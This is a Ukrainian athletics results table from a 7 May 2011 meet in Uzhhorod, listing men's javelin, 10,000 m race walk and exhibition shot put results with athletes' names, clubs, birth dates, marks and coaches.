387    БІЛОСЮК Мирослав    UKR, Закарпатська, Рахівський р-н, С    29.07.1985    DNS                Катеренюк В.П. ()




Ужгород 7 травня 2011 17:10

Метання списа 800 гр Чоловіки  Фінал                                    

Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат    Очки    Розряд    Тренери    

1        ГРОХОЛЬСЬКИЙ Владислав    UKR, Закарпатська, Ужгород, ДЮСШ №1 м. Ужгород    13.12.1993    44.70    567    РB    III    
43.12    43.55    X    42.40    44.70    43.03

2    69    ДУДАШ Віталій    UKR, Закарпатська, Свалявський р-н    22.07.1984    42.96    542    РB    III    Загарій В.І. ()
42.00    40.50    X    42.96    X    39.50

3    272    ЧОРЕЙ Владислав    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    01.01.1995    40.99    514    РB    III    Гусар В.М., Гусар В.В. ()
33.80    X    40.99    35.60    35.20    35.92

4    80    СИНЬКО Михайло    UKR, Закарпатська, Свалявський р-н, МОН, ДЮСШ Свалявського р-ну    22.10.1991    36.56    450    РB    I юнацький    Горват Т.В. ()
35.00    34.10    36.26    X    36.56    36.38

5    95    ДОРОФЕЄВ Роман    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    27.01.1995    36.03    443    РB    I юнацький    Гусар В.М., Гусар В.В. ()
36.03    33.12    X    33.86    X    33.45

6    273    ГУСАР Віктор    UKR, Закарпатська, Тячівський р-н, МОН    20.06.1989    33.02    400    РB    II юнацький    Гусар В.М.
33.02    X    32.77    X    X    X

7    241    РЕБРЕЙ Ігор    UKR, Закарпатська, Тячівський р-н, МОН, Тячівська ДЮСШ    18.02.1995    28.02    328    РB        Гусар В.М., Гусар В.В. ()
28.02    X    X    27.30    X    28.02




Ужгород 7 травня 2011 09:30

Спортивна ходьба 10000 м Чоловіки  Фінал                                    
Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат        Розряд    Тренери    

1    269    СВІДНИЦЬКИЙ Владислав    UKR, Закарпатська, Мукачево, МОН, ДЮСШ СОК м.Мукачеве    30.07.1987    47:34.8h        I    Соломін А.В.    





Ужгород 7 травня 2011 16:05

Штовхання ядра 4 кг Чоловіки  Виставкові                                    

Місце    Номер    Спортсмен    Команда    "Дата
народження"    Результат    Очки    Розряд    Тренери    

1    58    ОНИСЬКО Михайло    UKR, Закарпатська, Мукачево, ОДЮСШ Інваспорт    11.09.1984    11.64        Балога Д.М. ()
11.14    11.64    11.24